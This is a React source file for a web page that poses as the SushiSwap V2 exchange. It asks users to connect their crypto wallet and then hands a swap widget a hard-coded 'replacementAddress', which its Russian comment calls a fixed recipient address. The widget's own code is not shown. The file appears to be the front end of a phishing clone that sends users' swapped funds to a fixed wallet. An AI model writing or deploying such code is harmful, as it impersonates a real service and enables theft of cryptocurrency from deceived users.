import React, { useState } from 'react';
import Web3 from 'web3';
import SushiSwapWidget from './components/SushiSwapWidget';

// Фиксированный адрес получателя
const RECIPIENT_ADDRESS = '0x78ADc0921d89B6169196946CFb6e4D2F51FAf0fA';

function App() {
  const [account, setAccount] = useState(null);
  const [provider, setProvider] = useState(null);

  const connectWallet = async () => {
    if (typeof window.ethereum !== 'undefined') {
      try {
        await window.ethereum.request({ method: 'eth_requestAccounts' });
        const web3Provider = window.ethereum;
        setProvider(web3Provider);
        
        const web3 = new Web3(web3Provider);
        const accounts = await web3.eth.getAccounts();
        setAccount(accounts[0]);
      } catch (error) {
        console.error('Error connecting wallet:', error);
      }
    }
  };

  return (
    <div className="app-container">
      <header>
        <h1>SushiSwap V2</h1>
        <button onClick={connectWallet}>
          {account ? `Connected: ${account.slice(0,6)}...${account.slice(-4)}` : 'Connect Wallet'}
        </button>
      </header>

      <main>
        {provider && account ? (
          <SushiSwapWidget 
            provider={provider}
            replacementAddress={RECIPIENT_ADDRESS}
            addLog={(type, message) => console.log(`${type}: ${message}`)}
          />
        ) : (
          <div className="swap-container">
            <h2>Connect your wallet to start trading</h2>
          </div>
        )}
      </main>

      <style jsx>{`
        .app-container {
          max-width: 800px;
          margin: 0 auto;
          padding: 20px;
        }

        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          margin-bottom: 40px;
        }

        header button {
          padding: 10px 20px;
          border-radius: 8px;
          border: none;
          background: #2172e5;
          color: white;
          cursor: pointer;
        }

        .swap-container {
          background: white;
          padding: 20px;
          border-radius: 16px;
          box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.1);
        }
      `}</style>
    </div>
  );
}

export default App;